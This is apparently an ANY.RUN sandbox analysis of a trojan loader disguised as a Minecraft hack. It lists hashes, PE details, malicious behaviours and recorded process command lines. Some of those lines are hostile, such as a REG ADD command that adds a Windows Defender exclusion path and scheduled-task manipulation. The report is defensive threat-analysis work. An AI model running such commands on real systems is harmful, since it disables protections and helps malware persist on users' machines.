File name:

MINECRAFT_HACK_V2.32.exe

Full analysis: https://app.any.run/tasks/93eb1472-9624-400f-a713-3033d8e0bccc
Verdict: Malicious activity
Threats:

Adware is a form of malware that targets users with unwanted advertisements, often disrupting their browsing experience. It typically infiltrates systems through software bundling, malicious websites, or deceptive downloads. Once installed, it may track user activity, collect sensitive data, and display intrusive ads, including pop-ups or banners. Some advanced adware variants can bypass security measures and establish persistence on devices, making removal challenging. Additionally, adware can create vulnerabilities that other malware can exploit, posing a significant risk to user privacy and system security.

Malware Trends Tracker     >>>
Analysis date: August 24, 2019, 09:36:52
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
adware
pup
trojan
loader
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows, PECompact2 compressed
MD5:

A76DB41385A79B8A75F38AA62142CFB7

SHA1:

8BA03A380657100B38BAB5745A075403538AE32B

SHA256:

7FD65843F1523A5170DB1D0BBD5A2FD7C0641106D80797E01EF407EA5FBDA3AA

SSDEEP:

49152:xcl+6hQNM50dhb5vlyLNDPLATZXMoJUPuZFOqDZuYePC:xcY6h++0dztQbLAeoJUWfOq1uzPC

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • wS1paWlpD.exe (PID: 3060)
      • w75638d09e349.exe (PID: 2248)
      • wed8489feea54.exe (PID: 4092)
      • na_runner.exe (PID: 2360)
      • MailRuUpdater.exe (PID: 3964)
      • smappscontroller.exe (PID: 3956)
      • MailRuUpdater.exe (PID: 3808)
      • 4a48-e963-7acb-b809 (PID: 3048)
      • mrupdsrv.exe (PID: 3072)
      • MailRuUpdater.exe (PID: 2916)
      • MailRuUpdater.exe (PID: 2440)
      • MailRuUpdater.exe (PID: 2460)
      • wa92e4e31ddfa.exe (PID: 2280)
      • MailRuUpdater.exe (PID: 2928)
      • MailRuUpdater.exe (PID: 4008)
      • setup.exe (PID: 3080)
      • viewU.exe (PID: 3324)
      • viewU.exe (PID: 2804)
      • view.exe (PID: 948)
      • chromedriver.exe (PID: 4036)
      • chrome.exe (PID: 2548)
      • chrome.exe (PID: 1876)
      • chrome.exe (PID: 3188)
      • chrome.exe (PID: 2316)
      • chrome.exe (PID: 1216)
      • chrome.exe (PID: 3576)
      • chrome.exe (PID: 2620)
      • chrome.exe (PID: 776)
      • Extreme Injector v3.exe (PID: 3840)
      • setup.exe (PID: 1348)
      • RunSI.exe (PID: 560)
      • wcc619dfede3b.exe (PID: 4028)
      • chrome.exe (PID: 2480)
      • infoSiw.exe (PID: 2372)
      • node.exe (PID: 1304)
      • node.exe (PID: 2764)
      • Extreme Injector v3.exe (PID: 4024)
      • Extreme Injector v3.exe (PID: 2596)
      • Extreme Injector v3.exe (PID: 1632)
      • kCCZxQhrJpnFHvoi.exe (PID: 2880)
      • w5cb7f0c3f70e.exe (PID: 2200)
      • w5cb7f0c3f70e.exe (PID: 3084)
      • w096dac12849a.exe (PID: 2352)
      • python.exe (PID: 3376)
      • python.exe (PID: 3716)
      • python.exe (PID: 1764)
      • python.exe (PID: 3860)
      • python.exe (PID: 2780)
      • ns3646.tmp (PID: 2452)
      • python.exe (PID: 2328)
      • viewU.exe (PID: 2792)
      • view.exe (PID: 3428)
      • chrome.exe (PID: 2676)
      • chromedriver.exe (PID: 3232)
      • chrome.exe (PID: 2580)
      • w39c879301edd.exe (PID: 3836)
      • chrome.exe (PID: 2324)
      • chrome.exe (PID: 2220)
      • chrome.exe (PID: 2260)
      • chrome.exe (PID: 2156)
      • chrome.exe (PID: 3608)
      • chrome.exe (PID: 1648)
      • chrome.exe (PID: 2312)
      • chrome.exe (PID: 1020)
      • chrome.exe (PID: 3404)
      • chrome.exe (PID: 3228)
      • chrome.exe (PID: 4476)
      • chrome.exe (PID: 2872)
      • chrome.exe (PID: 3204)
      • chrome.exe (PID: 3504)

    • Connects to CnC server

      • wS1paWlpD.exe (PID: 3060)
      • w75638d09e349.exe (PID: 2248)
      • MailRuUpdater.exe (PID: 3808)

    • MAILRU was detected

      • w75638d09e349.exe (PID: 2248)
      • MailRuUpdater.exe (PID: 3808)

    • Changes the autorun value in the registry

      • w75638d09e349.exe (PID: 2248)
      • na_runner.exe (PID: 2360)
      • MailRuUpdater.exe (PID: 2460)
      • setup.exe (PID: 3080)
      • python.exe (PID: 3860)
      • python.exe (PID: 1764)

    • Uses Task Scheduler to run other applications

      • wed8489feea54.tmp (PID: 2976)
      • w5cb7f0c3f70e.exe (PID: 2200)
      • kCCZxQhrJpnFHvoi.exe (PID: 2880)
      • rundll32.exe (PID: 3824)
      • python.exe (PID: 1764)
      • python.exe (PID: 3860)

    • Loads the Task Scheduler COM API

      • na_runner.exe (PID: 2360)
      • schtasks.exe (PID: 3568)
      • schtasks.exe (PID: 2804)
      • schtasks.exe (PID: 3844)
      • MailRuUpdater.exe (PID: 2460)
      • schtasks.exe (PID: 1512)
      • schtasks.exe (PID: 2864)
      • schtasks.exe (PID: 3412)
      • schtasks.exe (PID: 664)
      • schtasks.exe (PID: 3932)
      • schtasks.exe (PID: 2072)
      • schtasks.exe (PID: 2824)
      • schtasks.exe (PID: 3904)
      • schtasks.exe (PID: 2920)
      • schtasks.exe (PID: 3092)
      • schtasks.exe (PID: 1420)
      • schtasks.exe (PID: 392)
      • schtasks.exe (PID: 4072)
      • schtasks.exe (PID: 664)
      • schtasks.exe (PID: 3332)
      • schtasks.exe (PID: 1648)
      • schtasks.exe (PID: 3488)
      • schtasks.exe (PID: 3204)
      • schtasks.exe (PID: 2680)
      • schtasks.exe (PID: 2272)
      • schtasks.exe (PID: 3068)
      • schtasks.exe (PID: 2568)
      • schtasks.exe (PID: 2516)
      • schtasks.exe (PID: 2684)
      • schtasks.exe (PID: 2104)

    • Changes Windows auto-update feature

      • w75638d09e349.exe (PID: 2248)

    • Registers / Runs the DLL via REGSVR32.EXE

      • w75638d09e349.exe (PID: 2248)

    • Disables Windows Defender

      • w75638d09e349.exe (PID: 2248)

    • Loads dropped or rewritten executable

      • regsvr32.exe (PID: 3452)
      • wa92e4e31ddfa.exe (PID: 2280)
      • setup.exe (PID: 3080)
      • viewU.exe (PID: 2804)
      • view.exe (PID: 948)
      • viewU.exe (PID: 3324)
      • chrome.exe (PID: 2548)
      • chrome.exe (PID: 2620)
      • wcc619dfede3b.exe (PID: 4028)
      • chrome.exe (PID: 1876)
      • chrome.exe (PID: 3188)
      • chrome.exe (PID: 3576)
      • chrome.exe (PID: 2316)
      • chrome.exe (PID: 1216)
      • chrome.exe (PID: 2480)
      • chrome.exe (PID: 776)
      • setup.exe (PID: 1348)
      • infoSiw.exe (PID: 2372)
      • RunSI.exe (PID: 560)
      • rundll32.EXE (PID: 4072)
      • rundll32.exe (PID: 3824)
      • python.exe (PID: 2328)
      • python.exe (PID: 3860)
      • python.exe (PID: 1764)
      • python.exe (PID: 3376)
      • w096dac12849a.exe (PID: 2352)
      • python.exe (PID: 3716)
      • python.exe (PID: 2780)
      • view.exe (PID: 3428)
      • viewU.exe (PID: 2792)
      • chrome.exe (PID: 2676)
      • chrome.exe (PID: 2580)
      • chrome.exe (PID: 2156)
      • chrome.exe (PID: 3608)
      • chrome.exe (PID: 2220)
      • chrome.exe (PID: 2324)
      • chrome.exe (PID: 1648)
      • chrome.exe (PID: 2260)
      • chrome.exe (PID: 2312)
      • chrome.exe (PID: 3204)
      • chrome.exe (PID: 1020)
      • chrome.exe (PID: 3404)
      • chrome.exe (PID: 3228)
      • chrome.exe (PID: 4476)
      • chrome.exe (PID: 3504)
      • chrome.exe (PID: 2872)

    • Downloads executable files from the Internet

      • wa92e4e31ddfa.exe (PID: 2280)
      • wcc619dfede3b.exe (PID: 4028)

    • Loads the Task Scheduler DLL interface

      • schtasks.exe (PID: 3164)
      • schtasks.exe (PID: 2564)
      • schtasks.exe (PID: 4088)

    • Modifies exclusions in Windows Defender

      • reg.exe (PID: 3752)
      • reg.exe (PID: 4060)
      • reg.exe (PID: 1520)
      • reg.exe (PID: 2536)
      • reg.exe (PID: 3892)
      • reg.exe (PID: 3456)
      • reg.exe (PID: 3392)
      • reg.exe (PID: 4020)
      • reg.exe (PID: 2948)
      • reg.exe (PID: 3552)
      • reg.exe (PID: 3360)

    • Uses Task Scheduler to autorun other applications

      • kCCZxQhrJpnFHvoi.exe (PID: 2880)

    • Modifies files in Chrome extension folder

      • kCCZxQhrJpnFHvoi.exe (PID: 2880)
      • w39c879301edd.exe (PID: 3836)

    • Changes internet zones settings

      • kCCZxQhrJpnFHvoi.exe (PID: 2880)

    • Changes settings of System certificates

      • python.exe (PID: 3376)

  • SUSPICIOUS

    • Reads Environment values

      • wS1paWlpD.exe (PID: 3060)
      • viewU.exe (PID: 2804)
      • view.exe (PID: 948)
      • infoSiw.exe (PID: 2372)
      • RunSI.exe (PID: 560)
      • viewU.exe (PID: 2792)
      • view.exe (PID: 3428)

    • Executable content was dropped or overwritten

      • MINECRAFT_HACK_V2.32.exe (PID: 3624)
      • w75638d09e349.exe (PID: 2248)
      • wed8489feea54.exe (PID: 4092)
      • wS1paWlpD.exe (PID: 3060)
      • wed8489feea54.tmp (PID: 2976)
      • na_runner.exe (PID: 2360)
      • MailRuUpdater.exe (PID: 3808)
      • 4a48-e963-7acb-b809 (PID: 3048)
      • MailRuUpdater.exe (PID: 3964)
      • MailRuUpdater.exe (PID: 2916)
      • wa92e4e31ddfa.exe (PID: 2280)
      • regsvr32.exe (PID: 3452)
      • MailRuUpdater.exe (PID: 2460)
      • setup.exe (PID: 3080)
      • wcc619dfede3b.exe (PID: 4028)
      • setup.exe (PID: 1348)
      • w5cb7f0c3f70e.exe (PID: 2200)
      • kCCZxQhrJpnFHvoi.exe (PID: 2880)
      • rundll32.EXE (PID: 4072)
      • w096dac12849a.exe (PID: 2352)

    • Reads CPU info

      • wS1paWlpD.exe (PID: 3060)

    • Creates files in the program directory

      • w75638d09e349.exe (PID: 2248)
      • na_runner.exe (PID: 2360)
      • MailRuUpdater.exe (PID: 3964)
      • 4a48-e963-7acb-b809 (PID: 3048)
      • kCCZxQhrJpnFHvoi.exe (PID: 2880)

    • Low-level read access rights to disk partition

      • wS1paWlpD.exe (PID: 3060)

    • Reads the cookies of Google Chrome

      • w75638d09e349.exe (PID: 2248)

    • Reads the cookies of Mozilla Firefox

      • w75638d09e349.exe (PID: 2248)

    • Reads the Windows organization settings

      • wed8489feea54.tmp (PID: 2976)

    • Reads Windows owner or organization settings

      • wed8489feea54.tmp (PID: 2976)

    • Creates files in the user directory

      • w75638d09e349.exe (PID: 2248)
      • wed8489feea54.tmp (PID: 2976)
      • MailRuUpdater.exe (PID: 3964)
      • wa92e4e31ddfa.exe (PID: 2280)
      • chromedriver.exe (PID: 4036)
      • wcc619dfede3b.exe (PID: 4028)
      • chrome.exe (PID: 2548)
      • setup.exe (PID: 3080)
      • chrome.exe (PID: 2620)
      • cmd.exe (PID: 2704)
      • infoSiw.exe (PID: 2372)
      • RunSI.exe (PID: 560)
      • cmd.exe (PID: 3128)
      • kCCZxQhrJpnFHvoi.exe (PID: 2880)
      • python.exe (PID: 3716)
      • python.exe (PID: 3376)
      • python.exe (PID: 2328)
      • w096dac12849a.exe (PID: 2352)
      • chrome.exe (PID: 2580)
      • setup.exe (PID: 1348)
      • chrome.exe (PID: 2676)

    • Uses TASKKILL.EXE to kill process

      • wed8489feea54.tmp (PID: 2976)

    • Searches for installed software

      • wS1paWlpD.exe (PID: 3060)
      • smappscontroller.exe (PID: 3956)

    • Creates a software uninstall entry

      • na_runner.exe (PID: 2360)
      • MailRuUpdater.exe (PID: 2460)
      • setup.exe (PID: 3080)
      • kCCZxQhrJpnFHvoi.exe (PID: 2880)
      • w096dac12849a.exe (PID: 2352)

    • Starts itself from another location

      • na_runner.exe (PID: 2360)
      • MailRuUpdater.exe (PID: 2460)
      • w5cb7f0c3f70e.exe (PID: 2200)
      • python.exe (PID: 2328)

    • Executed as Windows Service

      • MailRuUpdater.exe (PID: 3808)
      • mrupdsrv.exe (PID: 3072)
      • MailRuUpdater.exe (PID: 2440)
      • MailRuUpdater.exe (PID: 4008)

    • Creates files in the Windows directory

      • MailRuUpdater.exe (PID: 3808)
      • w75638d09e349.exe (PID: 2248)
      • mrupdsrv.exe (PID: 3072)
      • schtasks.exe (PID: 3164)
      • w5cb7f0c3f70e.exe (PID: 3084)
      • cmd.exe (PID: 2272)
      • schtasks.exe (PID: 2564)
      • schtasks.exe (PID: 4088)
      • kCCZxQhrJpnFHvoi.exe (PID: 2880)

    • Starts application with an unusual extension

      • MailRuUpdater.exe (PID: 3808)
      • w096dac12849a.exe (PID: 2352)

    • Removes files from Windows directory

      • MailRuUpdater.exe (PID: 3808)
      • MailRuUpdater.exe (PID: 2916)
      • MailRuUpdater.exe (PID: 4008)
      • w5cb7f0c3f70e.exe (PID: 3084)
      • kCCZxQhrJpnFHvoi.exe (PID: 2880)

    • Creates COM task schedule object

      • regsvr32.exe (PID: 3452)
      • kCCZxQhrJpnFHvoi.exe (PID: 2880)

    • Changes the started page of IE

      • w75638d09e349.exe (PID: 2248)

    • Application launched itself

      • chrome.exe (PID: 2620)
      • python.exe (PID: 2328)
      • rundll32.EXE (PID: 4072)
      • python.exe (PID: 2780)
      • chrome.exe (PID: 2676)

    • Starts CMD.EXE for commands execution

      • RunSI.exe (PID: 560)
      • w5cb7f0c3f70e.exe (PID: 3084)
      • view.exe (PID: 948)

    • Executed via Task Scheduler

      • w5cb7f0c3f70e.exe (PID: 3084)
      • rundll32.EXE (PID: 4072)

    • Uses REG.EXE to modify Windows registry

      • cmd.exe (PID: 3880)
      • cmd.exe (PID: 3612)
      • wscript.exe (PID: 3992)

    • Executes scripts

      • w5cb7f0c3f70e.exe (PID: 3084)

    • Reads Internet Cache Settings

      • kCCZxQhrJpnFHvoi.exe (PID: 2880)

    • Changes IE settings (feature browser emulation)

      • kCCZxQhrJpnFHvoi.exe (PID: 2880)

    • Uses RUNDLL32.EXE to load library

      • rundll32.EXE (PID: 4072)

    • Loads Python modules

      • python.exe (PID: 2328)
      • python.exe (PID: 3860)
      • python.exe (PID: 3376)
      • python.exe (PID: 3716)
      • python.exe (PID: 1764)

    • Adds / modifies Windows certificates

      • python.exe (PID: 3376)

  • INFO

    • Creates files in the program directory

      • wed8489feea54.tmp (PID: 2976)

    • Loads dropped or rewritten executable

      • wed8489feea54.tmp (PID: 2976)

    • Application was dropped or rewritten from another process

      • wed8489feea54.tmp (PID: 2976)

    • Creates a software uninstall entry

      • wed8489feea54.tmp (PID: 2976)

    • Reads settings of System Certificates

      • MailRuUpdater.exe (PID: 3964)
      • MailRuUpdater.exe (PID: 2928)
      • MailRuUpdater.exe (PID: 4008)
      • chrome.exe (PID: 2620)
      • python.exe (PID: 3376)

    • Manual execution by user

      • WinRAR.exe (PID: 2332)
      • Extreme Injector v3.exe (PID: 3840)
      • Extreme Injector v3.exe (PID: 1632)
      • Extreme Injector v3.exe (PID: 4024)
      • Extreme Injector v3.exe (PID: 2596)

    • Dropped object may contain Bitcoin addresses

      • setup.exe (PID: 3080)
      • setup.exe (PID: 1348)
      • w096dac12849a.exe (PID: 2352)
      • python.exe (PID: 3716)

    • Application was crashed

      • Extreme Injector v3.exe (PID: 3840)
      • Extreme Injector v3.exe (PID: 1632)
      • Extreme Injector v3.exe (PID: 4024)
      • Extreme Injector v3.exe (PID: 2596)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 EXE PECompact compressed (v2.x) (50.1)
.exe | Win32 EXE PECompact compressed (generic) (35.2)
.dll | Win32 Dynamic Link Library (generic) (5.5)
.exe | Win32 Executable (generic) (3.8)
.exe | Win16/32 Executable Delphi generic (1.7)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2019:06:20 13:21:01+02:00
PEType: PE32
LinkerVersion: 2.25
CodeSize: 888320
InitializedDataSize: 1650688
UninitializedDataSize: -
EntryPoint: 0xda7f4
OSVersion: 5
ImageVersion: -
SubsystemVersion: 5
Subsystem: Windows GUI

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 20-Jun-2019 11:21:01

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0050
Pages in file: 0x0002
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x000F
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x001A
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x00000100

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 2
Time date stamp: 20-Jun-2019 11:21:01
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_32BIT_MACHINE
  • IMAGE_FILE_BYTES_REVERSED_HI
  • IMAGE_FILE_BYTES_REVERSED_LO
  • IMAGE_FILE_EXECUTABLE_IMAGE
  • IMAGE_FILE_LINE_NUMS_STRIPPED
  • IMAGE_FILE_LOCAL_SYMS_STRIPPED

Sections

Name
Virtual Address
Virtual Size
Raw Size
Charateristics
Entropy
.text
0x00001000
0x00278000
0x0019D600
IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
7.99989
.rsrc
0x00279000
0x0000B000
0x0000AE00
IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
4.33036

Imports

advapi32.dll
kernel32.dll
netapi32.dll
oleaut32.dll
shell32.dll
user32.dll
version.dll
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
256
Monitored processes
143
Malicious processes
52
Suspicious processes
24

Behavior graph

Click at the process to see the details
drop and start start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start download and start drop and start drop and start download and start drop and start drop and start drop and start minecraft_hack_v2.32.exe ws1pawlpd.exe #MAILRU w75638d09e349.exe winrar.exe no specs wed8489feea54.exe wed8489feea54.tmp taskkill.exe no specs na_runner.exe smappscontroller.exe schtasks.exe no specs mailruupdater.exe #MAILRU mailruupdater.exe schtasks.exe no specs schtasks.exe no specs 4a48-e963-7acb-b809 mrupdsrv.exe mailruupdater.exe notepad.exe no specs regsvr32.exe wa92e4e31ddfa.exe mailruupdater.exe mailruupdater.exe mailruupdater.exe mailruupdater.exe winrar.exe no specs setup.exe viewu.exe no specs viewu.exe view.exe chromedriver.exe chrome.exe chrome.exe no specs wcc619dfede3b.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs extreme injector v3.exe setup.exe runsi.exe cmd.exe no specs node.exe no specs cmd.exe no specs infosiw.exe node.exe w5cb7f0c3f70e.exe schtasks.exe no specs schtasks.exe no specs w5cb7f0c3f70e.exe no specs gpupdate.exe no specs extreme injector v3.exe extreme injector v3.exe extreme injector v3.exe cmd.exe no specs reg.exe no specs cmd.exe no specs reg.exe no specs cmd.exe no specs wscript.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs gpupdate.exe no specs kcczxqhrjpnfhvoi.exe schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs gpupdate.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs rundll32.exe schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs rundll32.exe no specs schtasks.exe no specs schtasks.exe no specs w096dac12849a.exe ns3646.tmp no specs python.exe python.exe python.exe python.exe python.exe no specs python.exe schtasks.exe no specs schtasks.exe no specs w39c879301edd.exe cmd.exe no specs viewu.exe view.exe chromedriver.exe chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs minecraft_hack_v2.32.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
392schtasks /DELETE /TN "CRnxQxdxhdYHO2" /FC:\Windows\system32\schtasks.exekCCZxQhrJpnFHvoi.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Manages scheduled tasks
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\schtasks.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
560C:\Users\admin\AppData\Roaming\infoSiw\RunSI.exeC:\Users\admin\AppData\Roaming\infoSiw\RunSI.exe
setup.exe
User:
admin
Integrity Level:
HIGH
Description:
RunSI
Exit code:
0
Version:
1.0.0.0
Modules
Images
c:\users\admin\appdata\roaming\infosiw\runsi.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
664schtasks /END /TN "VydEBmIoAbMbnxi"C:\Windows\system32\schtasks.exekCCZxQhrJpnFHvoi.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Manages scheduled tasks
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\schtasks.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
664schtasks /run /tn "QIvhlMLYbMJLHRu"C:\Windows\system32\schtasks.exekCCZxQhrJpnFHvoi.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\taskschd.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\msctf.dll
c:\windows\system32\ktmw32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\user32.dll
c:\windows\system32\kernelbase.dll
776"C:\Users\admin\AppData\Roaming\view\Chrome\Application\chrome.exe" --type=renderer --no-sandbox --enable-automation --enable-logging --log-level=0 --test-type=webdriver --field-trial-handle=972,1565396668729221956,3094166035896812107,131072 --disable-gpu-compositing --service-pipe-token=1106422895356507486 --enable-blink-features=ShadowDOMV0 --lang=en-US --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36" --user-data-dir="C:\Users\admin\AppData\Roaming\view\Chrome\NewProfile" --disable-client-side-phishing-detection --instant-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=1106422895356507486 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3524 /prefetch:1C:\Users\admin\AppData\Roaming\view\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
HIGH
Description:
Google Chrome
Exit code:
0
Version:
73.0.3683.75
Modules
Images
c:\users\admin\appdata\roaming\view\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\users\admin\appdata\roaming\view\chrome\application\73.0.3683.75\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
848REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\qZmfXbOWrNBFKIgg" /t REG_DWORD /d 0C:\Windows\system32\reg.execmd.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Registry Console Tool
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\reg.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
948C:\Users\admin\AppData\Roaming\view\view.exe dcM8NKNGyHC:\Users\admin\AppData\Roaming\view\view.exe
viewU.exe
User:
admin
Company:
GoldDay Corp
Integrity Level:
HIGH
Description:
View
Exit code:
0
Version:
1.0.0.0
Modules
Images
c:\users\admin\appdata\roaming\view\view.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
1020"C:\Users\admin\AppData\Roaming\view\Chrome\Application\chrome.exe" --type=renderer --no-sandbox --enable-automation --enable-logging --log-level=0 --test-type=webdriver --field-trial-handle=964,14865141138030123061,3892563664501406752,131072 --disable-gpu-compositing --service-pipe-token=12099868295543321018 --enable-blink-features=ShadowDOMV0 --lang=en-US --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6; rv:57.0) Gecko/20100101 Firefox/57.0" --user-data-dir="C:\Users\admin\AppData\Roaming\view\Chrome\NewProfile" --disable-client-side-phishing-detection --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=12099868295543321018 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1C:\Users\admin\AppData\Roaming\view\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
HIGH
Description:
Google Chrome
Exit code:
0
Version:
73.0.3683.75
Modules
Images
c:\users\admin\appdata\roaming\view\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\users\admin\appdata\roaming\view\chrome\application\73.0.3683.75\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
1216"C:\Users\admin\AppData\Roaming\view\Chrome\Application\chrome.exe" --type=renderer --no-sandbox --enable-automation --enable-logging --log-level=0 --test-type=webdriver --field-trial-handle=972,1565396668729221956,3094166035896812107,131072 --service-pipe-token=12534788424282868290 --enable-blink-features=ShadowDOMV0 --lang=en-US --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36" --user-data-dir="C:\Users\admin\AppData\Roaming\view\Chrome\NewProfile" --extension-process --disable-client-side-phishing-detection --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=12534788424282868290 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2180 /prefetch:1C:\Users\admin\AppData\Roaming\view\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
HIGH
Description:
Google Chrome
Exit code:
0
Version:
73.0.3683.75
Modules
Images
c:\users\admin\appdata\roaming\view\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\users\admin\appdata\roaming\view\chrome\application\73.0.3683.75\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
